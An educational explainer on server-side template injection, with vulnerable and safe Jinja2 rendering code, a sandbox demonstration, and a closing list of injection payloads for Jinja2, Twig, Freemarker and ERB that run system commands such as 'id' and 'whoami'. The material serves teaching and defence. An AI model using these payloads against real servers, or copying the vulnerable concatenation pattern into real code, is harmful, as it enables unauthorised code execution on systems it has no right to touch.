Server-Side Template Injection (SSTI) is a vulnerability where user input is embedded into a server-side template in an unsafe manner, allowing attackers to inject template directives that execute arbitrary code on the server.
Template engines process templates containing placeholders and directives. When user input is concatenated directly into templates rather than passed as data, attackers can inject template syntax to access objects, call methods, and ultimately execute code.
```python
from flask import render_template_string

# Python/Jinja2 - vulnerable: user input becomes part of the template source
def greet_vulnerable(user_input):
    template = "Hello " + user_input
    return render_template_string(template)

# Safe approach: the template is fixed; user input is passed as data
def greet_safe(user_input):
    return render_template_string("Hello {{name}}", name=user_input)
```
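The following script is an added illustration, not code from the original page: it renders the standard `{{7*7}}` probe through the vulnerable concatenation pattern and through the data-passing pattern, and shows Jinja2's sandboxed environment as a defence-in-depth layer. It assumes only that the `jinja2` package is installed.

```python
"""Added example (not from the original page). Assumes `jinja2` is installed."""
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment, SecurityError

# Constructed sample input: the arithmetic probe commonly used to detect SSTI.
PROBE = "{{7*7}}"


def render_vulnerable(user_input: str) -> str:
    # Vulnerable: the user input is spliced into the template SOURCE, so any
    # template directives it contains are parsed and evaluated by the engine.
    template = Environment().from_string("Hello " + user_input)
    return template.render()


def render_safe(user_input: str) -> str:
    # Safe: the template source is a fixed string; the user input is supplied
    # as a variable and is only ever treated as data to be printed.
    template = Environment().from_string("Hello {{ name }}")
    return template.render(name=user_input)


def render_sandboxed(template_source: str) -> str:
    # Defence in depth for the rare case where a template itself must be
    # user-supplied: the sandbox refuses access to underscore-prefixed
    # attributes such as __class__, which the object-walking payloads rely on.
    # It is not a substitute for keeping user input out of the template source.
    env = SandboxedEnvironment()
    try:
        return env.from_string(template_source).render()
    except SecurityError as exc:
        return f"blocked: {exc}"


if __name__ == "__main__":
    print(render_vulnerable(PROBE))   # the probe is evaluated: "Hello 49"
    print(render_safe(PROBE))         # the probe is printed literally
    print(render_sandboxed("{{ ''.__class__.__mro__ }}"))  # blocked by sandbox
```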
```
# Jinja2 (Python)
{{config}}
{{''.__class__.__mro__[1].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

# Twig (PHP)
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}

# Freemarker (Java)
${"freemarker.template.utility.Execute"?new()("id")}

# ERB (Ruby)
<%= system("whoami") %>

# Detection probes
{{7*7}}                    # returns 49
${'test'.toUpperCase()}
```